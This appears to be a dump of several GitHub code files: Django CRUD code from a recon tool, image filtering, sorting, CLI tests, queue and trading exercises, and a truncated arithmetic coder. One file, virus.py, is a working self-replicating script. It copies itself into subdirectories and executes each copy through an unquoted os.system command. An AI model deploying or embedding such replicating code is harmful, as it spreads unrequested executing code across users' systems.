'辽宁省',\n 'key': '330000',\n },\n 'city': {\n 'label': '沈阳市',\n 'key': '330100',\n },\n },\n 'address': 'Nowhere',\n 'phone': '000-888888888'\n }\n\n return current_info\n\n\nclass Settings(object):\n def __init__(self):\n pass\n\n @staticmethod\n def list(kind, activated):\n if activated is True or activated == 'true':\n # 获取激活的配置\n try:\n model = SettingModel.objects.get(kind=kind, activating=True)\n result = SettingSerializer(model, many=False).data\n result = Settings._deal_pasword_field(result, 'RPC_TOKEN')\n CODE = 200\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n CODE = 404\n logger.warning(E)\n logger.warning(\"存在多个激活配置\")\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n models = SettingModel.objects.filter(kind=kind)\n result = SettingSerializer(models, many=True).data\n result = Settings._deal_pasword_field(result, 'RPC_TOKEN')\n CODE = 200\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def list_activated_setting(kind):\n try:\n model = SettingModel.objects.get(kind=kind, activating=True)\n result = SettingSerializer(model, many=False).data\n return result\n except Exception as E:\n return None\n\n @staticmethod\n def create(kind, tag, setting):\n if isinstance(setting, str):\n setting = json.loads(setting)\n\n defaultDict = {'kind': kind, 'tag': tag, 'setting': setting, } # 没有该主机数据时新建\n model, created = SettingModel.objects.get_or_create(kind=kind, setting=setting, defaults=defaultDict)\n if created is True:\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n # 有历史数据\n with transaction.atomic():\n try:\n model = SettingModel.objects.select_for_update().get(id=model.id)\n model.tag = tag\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.error(E)\n result = SettingSerializer(model, many=False).data\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def update(id, activating, tag, setting):\n if activating is True:\n # 配置激活流程\n try:\n model = SettingModel.objects.get(id=id)\n models = SettingModel.objects.filter(kind=model.kind).update(activating=False)\n model.activating = True\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.warning(E)\n logger.warning(\"尝试激活不存在的配置\")\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n else:\n # 更新配置流程\n defaultDict = {'id': id, 'tag': tag, 'setting': setting} # 没有该主机数据时新建\n model, created = SettingModel.objects.get_or_create(id=id, defaults=defaultDict)\n if created is True:\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n # 有历史数据\n with transaction.atomic():\n try:\n model = SettingModel.objects.select_for_update().get(id=id)\n model.tag = tag\n model.setting = setting\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.error(E)\n result = SettingSerializer(model, many=False).data\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def destory(id):\n try:\n row_cont, row_cont_dict = SettingModel.objects.filter(id=id).delete()\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def _deal_pasword_field(data, field):\n if isinstance(data, dict):\n setting = data.get('setting')\n oldstr = data.get('setting').get(field)\n if len(oldstr) <= 3:\n pass\n else:\n data['setting'][field] = oldstr[0:3] + \"*************\"\n return data\n elif isinstance(data, list):\n for one in data:\n setting = one.get('setting')\n oldstr = one.get('setting').get(field)\n if len(oldstr) <= 3:\n pass\n else:\n one['setting'][field] = oldstr[0:3] + \"*************\"\n return data\n else:\n return data\n\n\nclass Project(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def list():\n Project._check_defalut_project_exist()\n models = ProjectModel.objects.all()\n result = ProjectSerializer(models, many=True).data\n CODE = 200\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def create(tag, name, desc):\n defaultDict = {'tag': tag, 'name': name, 'desc': desc, } # 没有该主机数据时新建\n model, created = ProjectModel.objects.get_or_create(tag=tag, name=name, desc=desc, defaults=defaultDict)\n if created is True:\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n else:\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def update(id, tag, name, desc):\n try:\n model = ProjectModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n if id == 0:\n model.tag = 'default'\n else:\n if model.tag == 'default':\n model.tag = 'other'\n else:\n model.tag = tag\n\n model.name = name\n model.desc = desc\n model.save()\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def destory(id):\n # 删除本表信息\n\n try:\n model = ProjectModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n try:\n row_cont, row_cont_dict = ProjectModel.objects.filter(id=id).delete()\n # 删除关联表信息\n IPaddress.destory_by_pid(id)\n Task.destory_by_pid(id)\n Website.destory_by_pid(id)\n\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n except Exception as E:\n logger.error(E)\n CODE = 406\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def _check_defalut_project_exist():\n \"\"\"检查默认项目是否存在\"\"\"\n if ProjectModel.objects.filter(id=0).count() < 1:\n model = ProjectModel()\n model.id = 0\n model.tag = 'default'\n model.name = '默认项目'\n model.desc = '该项目为系统默认项目'\n model.save()\n\n\nclass Task(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def list(pid):\n models = TaskModel.objects.filter(pid=pid).order_by('start_time').reverse()\n result = TaskSerializer(models, many=True).data\n CODE = 200\n for one in result:\n start_time = one.get('start_time')\n end_time = one.get('end_time')\n\n if end_time is None or end_time <= 0:\n used_time = int(time.time()) - start_time\n else:\n used_time = end_time - start_time\n one['used_time'] = used_time\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def create(pid, kind, kwargs):\n defaultDict = {'pid': pid, 'kind': kind, 'kwargs': kwargs, } # 没有该主机数据时新建\n model, created = TaskModel.objects.get_or_create(pid=pid, kind=kind, kwargs=kwargs, defaults=defaultDict)\n if created is True:\n task_id = CeleryTask.call_task(kind=kind, kwargs=kwargs)\n if task_id is not None:\n model.task_id = task_id\n model.status = 'PENDING'\n model.start_time = int(time.time())\n model.save()\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n else:\n if model.status in ['PENDING', 'STARTED', 'PROGRESS']:\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n task_id = CeleryTask.call_task(kind=kind, kwargs=kwargs)\n if task_id is not None:\n model.task_id = task_id\n model.status = 'PENDING'\n model.start_time = int(time.time())\n model.end_time = 0\n model.save()\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def update_task(task_id, status, retval, einfo):\n try:\n model = TaskModel.objects.get(task_id=task_id)\n except Exception as E:\n logger.warning(\"未找到对应的task信息,task: {} exception: {}\".format(task_id, E))\n return False\n # 调用task回调函数\n if status == \"SUCCESS\" or status == b\"SUCCESS\":\n flag = CeleryTask.result_callback(model.pid, model.kind, retval)\n if flag is True:\n model.status = 'STORED'\n model.end_time = int(time.time())\n model.save()\n return True\n else:\n logger.warning(\"存储任务结果失败,task_id: {},kind: {},retval: {}\".format(task_id, model.kind, retval))\n model.status = 'STOREFAIL'\n model.end_time = int(time.time())\n model.save()\n return False\n else:\n logger.warning(\"任务执行失败,task_id: {},status: {},einfo: {}\".format(task_id, status, einfo))\n model.status = status\n model.end_time = int(time.time())\n model.save()\n return False\n\n @staticmethod\n def destory(id):\n try:\n model = TaskModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n if model.status in ['STARTED', 'PROGRESS']:\n CODE = 400\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n try:\n row_cont, row_cont_dict = TaskModel.objects.filter(id=id).delete()\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n except Exception as E:\n logger.error(E)\n CODE = 406\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def destory_by_pid(pid):\n try:\n row_cont, row_cont_dict = TaskModel.objects.filter(pid=pid).delete()\n return row_cont\n except Exception as E:\n logger.error(E)\n return None\n","repo_name":"p4sschen/Toy4Recon","sub_path":"Core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":16140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26981463250","text":"# Author - Rohit Kishor Asegaonkar\n# Div-A Batch - B1\n# Roll No.-09 Gr. No.- 11810636 \n\nimport cv2\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt \n \nimage = cv2.imread('images/spider.jpeg')\nimage2 = cv2.imread('Results/CameraImage2.png')\n\nkern1 = cv2.getGaborKernel((5, 5), 2.0, 0, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern2 = cv2.getGaborKernel((5, 5), 2.0, np.pi/4, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern3 = cv2.getGaborKernel((5, 5), 2.0, np.pi/2, 4.0, 0.5, 0, ktype=cv2.CV_64F)\n\nfiltered_img_zero = cv2.filter2D(image,-1,kern1)\nfiltered_img_fortyfive = cv2.filter2D(image,-1,kern2)\nfiltered_img_ninety = cv2.filter2D(image,-1,kern3)\n\nres = cv2.add(filtered_img_zero,filtered_img_ninety)\nres1 = cv2.add(res,filtered_img_fortyfive)\n\nkern1_test = cv2.getGaborKernel((5, 5), 2.0, 0, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern2_test = cv2.getGaborKernel((5, 5), 2.0, np.pi/6, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern3_test = cv2.getGaborKernel((5, 5), 2.0, np.pi/3, 4.0, 0.5, 0, ktype=cv2.CV_64F)\n\nfiltered_img_zero_test = cv2.filter2D(image,-1,kern1_test)\nfiltered_img_fortyfive_test = cv2.filter2D(image,-1,kern2_test)\nfiltered_img_ninety_test = cv2.filter2D(image,-1,kern3_test)\n\nres_test = cv2.add(filtered_img_zero_test,filtered_img_ninety_test)\nres1_test = cv2.add(res_test,filtered_img_fortyfive_test)\n\nerror = cv2.norm(res1, res1_test, normType=cv2.NORM_L2)\nprint(error)\n\ntextstr = \"Euclidean Distance Between two images is \" + str(error)\nplt.gcf().text(0.4, 0.1, textstr, fontsize=14)\nplt.subplot(131)\nplt.title(\"Original Image\")\nplt.imshow(image)\nplt.subplot(132)\nplt.title(\"Filtered Image\")\nplt.imshow(res1)\nplt.subplot(133)\nplt.title(\"Test Image\")\nplt.imshow(res1_test)\nplt.show()","repo_name":"RohitAsegaonkar/vision-based-automation-lab","sub_path":"gaborusingcv2.py","file_name":"gaborusingcv2.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25959588742","text":"from numpy import *\nimport random\ndef mergesort(lyst):\n\t'''\n\tlyst:list being sorted\n\tcopyBuffer temporary space needed during merge\n\t'''\n\tcopyBuffer = zeros(len(lyst))\n\tmergeSortHelper(lyst,copyBuffer,0,len(lyst)-1)\n\t\ndef mergeSortHelper(lyst,copyBuffer,low,high):\n\t'''\n\tlyst : list being sorted\n\tcopyBuffer temp space needed during merge\n\tlow,high : bounds of sublist\n\tmiddle : midpoint of sublist\n\t'''\n\tif low < high:\n\t\tmiddle = (low + high) // 2\n\t\tmergeSortHelper(lyst,copyBuffer,low,middle)\n\t\tmergeSortHelper(lyst,copyBuffer,middle + 1,high)\n\t\tmerge(lyst,copyBuffer,low,middle,high)\n\ndef merge(lyst,copyBuffer,low,middle,high):\n\t\n\t'''\n\tInitialize i1 and i2 to the first items in each sublist\n\t'''\n\ti1 = low\n\ti2 = middle + 1\n\t\n\tfor i in range(low,high + 1):\n\t\tif i1 > middle:\n\t\t\tcopyBuffer[i] = lyst[i2] #First sublist exhausted\n\t\t\ti2 += 1\n\t\telif i2 > high:\n\t\t\tcopyBuffer[i] = lyst[i1] #Second sublist exhausted\n\t\t\ti1 += 1\n\t\telif lyst[i1] < lyst[i2]:\n\t\t\tcopyBuffer[i] = lyst[i1]\n\t\t\ti1 += 1 #Item in first sublist <\n\t\telse:\n\t\t\tcopyBuffer[i] = lyst[i2]\n\t\t\ti2 += 1 #Item in second sublist <\n\t\n\t\n\tfor i in range(low,high + 1): #copy sorted items back to\n\t\tlyst[i] = copyBuffer[i] #propre position in lyst\n\t\t\n\t\t\ndef main(size = 20,sort = mergesort):\n\tlyst = []\n\tfor count in range(size):\n\t\tlyst.append(random.randint(1,size+1))\n\tprint(lyst)\n\tsort(lyst)\n\tprint(lyst)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Nine-Songs/Fundamentals_of_Python","sub_path":"03/mergeSort1.py","file_name":"mergeSort1.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8293602854","text":"import sys\nfrom argparse import Namespace\nfrom io import StringIO\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nfrom un_yaml import UnCli, UnUri, __version__\n\nfrom .conftest import SRC_PACKAGE, TEST_URI, pytest, pytestmark # NOQA F401\n\n\n@pytest.fixture\ndef cli():\n return UnCli(SRC_PACKAGE, __version__)\n\n\n@pytest.fixture\ndef buf():\n result = StringIO()\n yield result\n result.close()\n\n\ndef test_cli(cli: UnCli):\n assert cli\n commands = cli.get(UnCli.K_CMD)\n assert commands\n assert \"list\" in commands\n\n\ndef test_cli_arg():\n d = {\"type\": \"Path\"}\n kw = UnCli.VALID_KEYS(d)\n assert kw\n\n\nasync def test_cli_parser(cli: UnCli, buf: StringIO):\n argv = [\"--version\"]\n parser = cli.make_parser()\n assert parser\n assert cli.parse(argv)\n await cli.run(argv, buf)\n assert \"un_yaml\" in buf.getvalue()\n\n\ndef test_cli_parse_arg(cli: UnCli):\n argv = [\"list\", TEST_URI]\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.command == \"list\"\n uri = names.uri\n assert isinstance(uri, UnUri)\n assert str(uri) == TEST_URI\n\n\ndef test_cli_parse_opt(cli: UnCli):\n argv = [\"get\", TEST_URI] # , \"--dir\", \".\"\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.command == \"get\"\n assert hasattr(names, \"dir\")\n assert names.dir == Path(\".\")\n assert not names.verbose\n\n\nasync def test_cli_verbose(cli: UnCli, buf: StringIO):\n argv = [\"get\", TEST_URI, \"--verbose\"] # , \"--dir\", \".\"\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.verbose\n\n\nasync def test_cli_run(cli: UnCli, buf: StringIO):\n # assert not await cli.run(None, buf) FAILS when using pytest arguments\n assert not await cli.run([], buf)\n await cli.run([\"list\", TEST_URI], buf)\n assert \"list\" in buf.getvalue()\n doc_opts = cli.conf.get(\"doc\")\n assert doc_opts\n uri_opts = doc_opts.get(TEST_URI)\n assert uri_opts\n assert uri_opts.get(UnCli.K_CMD) == \"list\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"tmp folder name issue\")\ndef test_cli_conf():\n uri = UnUri(TEST_URI)\n tool = uri.tool()\n argv = {\n UnUri.ARG_URI: uri,\n \"name\": \"test\",\n UnCli.K_CMD: \"list\",\n }\n with TemporaryDirectory() as tmpdir:\n cli = UnCli(pkg=SRC_PACKAGE, dir=tmpdir, version=__version__)\n cf = cli.conf\n assert cf\n assert tmpdir in str(cli.path)\n assert tmpdir in str(cf.path)\n assert \"Wrapper\" == cf.info(\"doc\")\n assert not cf.get(tool)\n\n assert not cli.path.exists()\n cli.log_resource(argv)\n assert cli.path.exists()\n\n contents = cli.path.read_text()\n assert \"name: test\" in contents\n\n opts = cf.get(tool)\n assert opts\n args = opts.get(TEST_URI)\n assert args\n assert args[\"name\"] == \"test\"\n assert args.get(UnUri.ARG_URI, False) is False\n assert args.get(UnCli.K_CMD) == \"list\"\n","repo_name":"data-yaml/un-yaml","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34899833394","text":"from collections import deque\n\ndef solution(priorities, location):\n # 우선순위와 뽑혀나가는 순서 덱 2개 만듦\n priorities = deque(priorities)\n orders = deque(list(range(len(priorities))))\n # 아예 여기는 인덱스를 다르게 처리함. \n # 왜냐면 똑같은 숫자가 여러 개 있을 수 있기 때문에\n orders[location] = 't' \n order = 0\n\n # 큐에 뭔가 있는 동안..\n while priorities:\n # 큐의 맨앞에 있는 것이 최고 우선순위라면\n if priorities[0] == max(priorities):\n order += 1 # 순번이 밀림. 실제로 pop할 때만 order 순번이 추가됨\n if orders[0] == 't': # 만약 우리가 찾던 그 문서라면\n return order # 바로 순번 출력\n priorities.popleft() # 아니라면 그냥 뽑음\n orders.popleft()\n else:\n priorities.rotate(-1)\n orders.rotate(-1)","repo_name":"dev-dain/Dukgorithm","sub_path":"week2/dain/42587.py","file_name":"42587.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"71022086652","text":"import sys\nimport os\nimport random\nimport string\n\n\ndef getRandomString(length):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\ndef copyFileToAnother(finput,foutput):\n with open(finput, \"r\") as f:\n with open(foutput, \"w\") as f1:\n for line in f:\n f1.write(line)\n os.chmod(foutput,0o775)\n\ndef getSubdirectories(path):\n my_dir = []\n directory_contents = os.listdir(path)\n for item in directory_contents:\n if os.path.isdir(item):\n my_dir.append(item)\n #print(\"DEBUG: getSubdirectories:\", my_dir)\n return my_dir\n\ndef sprayToSubDir(actualpath,filename,dirList,mark):\n for dir in dirList:\n newFilename = getRandomString(8)+\".py\"\n if not isMarkHere(actualpath,dir,mark):\n copyFileToAnother(filename,actualpath+\"/\"+dir+\"/\"+newFilename)\n relaunch(actualpath,dir,newFilename)\n\ndef relaunch(actualpath,dir,file):\n os.system(\"cd \"+actualpath+\"/\"+dir+\"/ && \"+\"python \"+file)\n\ndef isMarkHere(actualpath,directory,mark):\n return os.path.exists(actualpath+\"/\"+directory+\"/\"+mark)\n \ndef main(argv):\n if len(argv) != 1:\n print(\"usage: python {0}\".format(argv[0]))\n sys.exit(1)\n\n mark = \"MARK\"\n dirpath = os.getcwd()\n print(\"---------------\"+dirpath+\"----------------\")\n #print(\"DEBUG: main, actualpath='\"+dirpath+\"'\")\n subdirectories = getSubdirectories(dirpath)\n sprayToSubDir(dirpath,argv[0],subdirectories,mark)\n\nif __name__ == \"__main__\":\n main(sys.argv)","repo_name":"DamienGounot/VirologyPlayground","sub_path":"playground/virus.py","file_name":"virus.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34691597869","text":"# The program which takes specific traders' list and figures out top three traders who gave maximum contribution to overall trade\r\n\r\ndef remove_duplicates(customers):\r\n \"\"\"takes list and removes duplicates from it\"\"\"\r\n customer_names = []\r\n \r\n for customer_name in customers:\r\n no_of_occurance = customers.count(customer_name)\r\n\r\n # if no of occurance more than one it'll remove customer name \r\n if no_of_occurance > 1:\r\n customers.remove(customer_name)\r\n\r\n # it appends customer name only if it's not present in list named customer_names\r\n if customer_name not in customer_names:\r\n customer_names.append(customer_name)\r\n else:\r\n customer_names.append(customer_name)\r\n return customer_names\r\n\r\n\r\ndef top_three_contributors(contribution_in_trades):\r\n \"\"\"returns top three contributors\"\"\"\r\n # distributing customer names and contribution in separate lists\r\n customer_names = list(contribution_in_trades.keys())\r\n contribution = list(contribution_in_trades.values())\r\n top_contributors = []\r\n\r\n # looping three times for getting top three contributors\r\n for top_contributor_no in range(3):\r\n # finding max contribution and assigning its index \r\n max_contributor_index = contribution.index(max(contribution)) \r\n\r\n # it appends customer name only if customer name not already present in top contributors\r\n if customer_names[max_contributor_index] not in top_contributors: \r\n top_contributors.append(customer_names[max_contributor_index])\r\n \r\n # deleting items of top contributors to get rid of duplication\r\n contribution.__delitem__(max_contributor_index)\r\n customer_names.__delitem__(max_contributor_index)\r\n \r\n top_contributors.sort()\r\n return top_contributors\r\n\r\n\r\ndef mostActive(customers):\r\n \"\"\"returns Most active customers' list who trades atleast 5% of total trade\"\"\"\r\n # figuring out unique names\r\n customer_names = remove_duplicates(customers.copy())\r\n # for customer name and their no of trades\r\n customer_trades = {}\r\n # for customer's contribution in trade (in percentage)\r\n contribution_in_trades = {}\r\n # figuring out total trades by length of customers who trades\r\n total_trades = len(customers)\r\n\r\n # looping through customer_names to store no of trades and percentage of contribution\r\n for customer_name in customer_names:\r\n no_of_trades = customers.count(customer_name) # counting customer trades\r\n customer_trades[customer_name] = no_of_trades # storing no of trades \r\n contribution_in_trades[customer_name] = no_of_trades / total_trades # storing contribution in trades (in percentage)\r\n \r\n # getting list of top contributors and returning to main\r\n top_contributors = top_three_contributors(contribution_in_trades) \r\n return top_contributors\r\n \r\n\r\nif __name__ == '__main__':\r\n no_of_customers = int(input(\"Total customers : \"))\r\n\r\n customers = []\r\n # taking customers names from user and storing in list named customers\r\n for i in range(no_of_customers):\r\n customer_name = input()\r\n customers.append(customer_name)\r\n\r\n # gets list of most active customers and prints\r\n most_active_customers = mostActive(customers)\r\n print(\"\\nMost active customers are as follows:\")\r\n for i, most_active_customer in enumerate(most_active_customers, 1):\r\n print(i, most_active_customer.title())\r\n\r\n","repo_name":"Kuldeepbhavsar7/Python-programs","sub_path":"Top traders.py","file_name":"Top traders.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26823853457","text":"import bitfile\nEOF_CHAR=256\nPRECISION=16\nMSB_MASK=((1<<(PRECISION-1))-1)\nMAX_PROBABILITY=(1<<(PRECISION-2))\nclass ArithmeticCodeError(Exception):\n pass\nclass ArithmeticCode:\n def __init__(self,static=True):\n self._lower=0\n self._upper=0xFFFF\n self._code=0\n self._underflow_bits=0\n self._ranges=[0 for i in range(self.upper(EOF_CHAR)+1)]\n self._cumulative_prob=0\n self._infile=None\n self._outfile=None\n self._static_model=static\n @staticmethod\n def mask_bit(x):\n return(1<<(PRECISION-(1+x)))\n @staticmethod\n def lower(c):\n if type(c)==str:\n return ord(c)\n return c\n @staticmethod\n def upper(c):\n if type(c)==str:\n return ord(c)+1\n return c+1\n def encode_file(self,input_file_name,output_file_name):\n if(self._infile is not None)or(self._outfile is not None):\n raise ValueError('I/O operation on opened file.')\n if self._static_model:\n self._infile=open(input_file_name,'rb')\n self.build_probability_range_list()\n self._infile.seek(0)\n self._outfile=bitfile.BitFile()\n self._outfile.open(output_file_name,'wb')\n self.write_header()\n else:\n self.initialize_adaptive_probability_range_list()\n self._infile=open(input_file_name,'rb')\n self._outfile=bitfile.BitFile()\n self._outfile.open(output_file_name,'wb')\n c=self._infile.read(1)\n while(c!=''):\n self.apply_symbol_range(c)\n self.write_encoded_bits()\n c=self._infile.read(1)\n self._infile.close()\n self.apply_symbol_range(EOF_CHAR)\n self.write_encoded_bits()\n self.write_remaining()\n self._outfile.close()\n def build_probability_range_list(self):\n if self._infile is None:\n raise ArithmeticCodeError('No input file opened for encoding.')\n count_array=[0 for i in range(EOF_CHAR)]\n c=self._infile.read(1)\n while(c!=''):\n count_array[ord(c)]+=1\n c=self._infile.read(1)\n total_count=sum(count_array)\n if total_count>=MAX_PROBABILITY:\n rescale_value=(total_count/MAX_PROBABILITY)+1\n for index,value in enumerate(count_array):\n if value>rescale_value:\n count_array[index]=value/rescale_value\n elif value!=0:\n count_array[index]=1\n self._ranges=[0]+count_array+[1]\n self._cumulative_prob=sum(count_array)\n self.symbol_count_to_probability_ranges()\n def symbol_count_to_probability_ranges(self):\n self._ranges[0]=0\n self._ranges[self.upper(EOF_CHAR)]=1\n self._cumulative_prob+=1\n for c in range(EOF_CHAR+1):\n self._ranges[c+1]+=self._ranges[c]\n def write_header(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n previous=0\n for c in range(EOF_CHAR):\n if self._ranges[self.upper(c)]>previous:\n self._outfile.put_char(c)\n previous=(self._ranges[self.upper(c)]-previous)\n self._outfile.put_bits_ltom(previous,(PRECISION-2))\n previous=self._ranges[self.upper(c)]\n self._outfile.put_char(0)\n previous=0\n self._outfile.put_bits_ltom(previous,(PRECISION-2))\n def initialize_adaptive_probability_range_list(self):\n self._ranges=[i for i in range(self.upper(EOF_CHAR)+1)]\n self._cumulative_prob=EOF_CHAR+1\n def apply_symbol_range(self,symbol):\n range=self._upper-self._lower+1\n rescaled=self._ranges[self.upper(symbol)]*range\n rescaled/=self._cumulative_prob\n self._upper=self._lower+rescaled-1\n rescaled=self._ranges[self.lower(symbol)]*range\n rescaled/=self._cumulative_prob\n self._lower=self._lower+rescaled\n if not self._static_model:\n self._cumulative_prob+=1\n for i in range(self.upper(symbol),len(self._ranges)):\n self._ranges[i]+=1\n if self._cumulative_prob>=MAX_PROBABILITY:\n original=0\n for i in range(1,len(self._ranges)):\n delta=self._ranges[i]-original\n original=self._ranges[i]\n if delta<=2:\n self._ranges[i]=self._ranges[i-1]+1\n else:\n self._ranges[i]=self._ranges[i-1]+(delta/2)\n self._cumulative_prob=self._ranges[self.upper(EOF_CHAR)]\n def write_encoded_bits(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n mask_bit_zero=self.mask_bit(0)\n mask_bit_one=self.mask_bit(1)\n while True:\n if(self._upper^~self._lower)&mask_bit_zero:\n self._outfile.put_bit((self._upper&mask_bit_zero)!=0)\n while self._underflow_bits>0:\n self._outfile.put_bit((self._upper&mask_bit_zero)==0)\n self._underflow_bits-=1\n elif(~self._upper&self._lower)&mask_bit_one:\n self._underflow_bits+=1\n self._lower&=~(mask_bit_zero|mask_bit_one)\n self._upper|=mask_bit_one\n else:\n return\n self._lower&=MSB_MASK\n self._lower<<=1\n self._upper&=MSB_MASK\n self._upper<<=1\n self._upper|=0x0001\n def write_remaining(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n mask_bit_one=self.mask_bit(1)\n self._outfile.put_bit((self._lower&mask_bit_one)!=0)\n self._underflow_bits+=1\n for i in range(self._underflow_bits):\n self._outfile.put_bit((self._lower&mask_bit_one)==0)\n def decode_file(self,input_file_name,output_file_name):\n if(self._infile is not None)or(self._outfile is not None):\n raise ValueError('I/O operation on opened file.')\n self._infile=bitfile.BitFile()\n self._infile.open(input_file_name,'rb')\n if self._static_model:\n self.read_header()\n else:\n self.initialize_adaptive_probability_range_list()\n self.initialize_decoder()\n self._outfile=open(output_file_name,'wb')\n while True:\n unscaled=self.get_unscaled_code()\n c=self.get_symbol_from_probability(unscaled)\n if c==EOF_CHAR:\n break\n self._outfile.write(chr(c))\n self.apply_symbol_range(c)\n self.read_encoded_bits()\n self._outfile.close()\n self._infile.close()\n def read_header(self):\n if self._infile is None:\n raise ArithmeticCodeError('No input file opened for decoding.')\n self._cumulative_prob=0\n self._ranges=[0 for i in range(self.upper(EOF_CHAR)+1)]\n count=0\n while True:\n c=self._infile.get_char()\n count=self._infile.get_bits_ltom(PRECISION-2)\n if count==0:\n break\n elif self._ranges[self.upper(c)]!=0:\n raise ArithmeticCodeError('Duplicate entry for '+hex(ord(c))+' in header.')\n self._ranges[self.upper(c)]=count\n self._cumulative_prob+=count\n self.symbol_count_to_probability_ranges()\n def initialize_decoder(self):\n self._code=0\n for i in range(PRECISION):\n self._code<<=1\n try:\n next_bit=self._infile.get_bit()\n except EOFError:\n pass\n except:\n raise\n else:\n self._code|=next_bit\n self._lower=0\n self._upper=0xFFFF\n def get_unscaled_code(self):\n range=self._upper-self._lower+1\n unscaled=self._code-self._lower+1\n unscaled=unscaled*self._cumulative_prob-1\n unscaled/=range\n return unscaled\n def get_symbol_from_probability(self,probability):\n first=0\n last=self.upper(EOF_CHAR)\n middle=last/2\n while(last>=first):\n if probability=self._ranges[self.upper(middle)]:\n first=middle+1\n middle=first+((last-first)/2)\n else:\n return middle\n raise 